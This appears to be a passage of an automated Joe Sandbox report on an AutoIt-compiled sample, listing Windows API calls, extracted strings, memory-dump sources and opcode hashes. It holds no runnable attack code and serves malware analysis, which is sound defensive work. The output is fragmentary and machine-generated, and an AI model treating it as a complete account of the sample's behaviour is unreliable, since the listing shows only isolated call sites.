                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: '
                                                                        • API String ID: 3850602802-1997036262
                                                                        • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                        • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                                        • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                        • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                                        APIs
                                                                        • _strlen.LIBCMT ref: 0040F858
                                                                          • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                                          • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                                        • _sprintf.LIBCMT ref: 0040F9AE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove$_sprintf_strlen
                                                                        • String ID: %02X
                                                                        • API String ID: 1921645428-436463671
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: Combobox
                                                                        • API String ID: 3850602802-2096851135
                                                                        APIs
                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: LengthMessageSendTextWindow
                                                                        • String ID: edit
                                                                        • API String ID: 2978978980-2167791130
                                                                        APIs
                                                                        • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: GlobalMemorySleepStatus
                                                                        • String ID: @
                                                                        • API String ID: 2783356886-2766056989
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: htonsinet_addr
                                                                        • String ID: 255.255.255.255
                                                                        • API String ID: 3832099526-2422070025
                                                                        APIs
                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InternetOpen
                                                                        • String ID: <local>
                                                                        • API String ID: 2038078732-4266983199
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: __fread_nolock_memmove
                                                                        • String ID: EA06
                                                                        • API String ID: 1988441806-3962188686
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID: u,D
                                                                        • API String ID: 4104443479-3858472334
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • wsprintfW.USER32 ref: 0045612A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: MessageSend_mallocwsprintf
                                                                        • String ID: %d/%02d/%02d
                                                                        • API String ID: 1262938277-328681919
                                                                        APIs
                                                                        • InternetCloseHandle.WININET(?), ref: 00442663
                                                                        • InternetCloseHandle.WININET ref: 00442668
                                                                          • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: CloseHandleInternet$ObjectSingleWait
                                                                        • String ID: aeB
                                                                        • API String ID: 857135153-906807131
                                                                        APIs
                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                                        • PostMessageW.USER32(00000000), ref: 00441C05
                                                                          • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: FindMessagePostSleepWindow
                                                                        • String ID: Shell_TrayWnd
                                                                        • API String ID: 529655941-2988720461
                                                                        APIs
                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                                          • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: FindMessagePostSleepWindow
                                                                        • String ID: Shell_TrayWnd
                                                                        • API String ID: 529655941-2988720461
                                                                        • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                        • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                                        • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                        • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                                        APIs
                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                                          • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Message_doexit
                                                                        • String ID: AutoIt$Error allocating memory.
                                                                        • API String ID: 1993061046-4017498283
                                                                        • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                        • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                                        • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                        • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D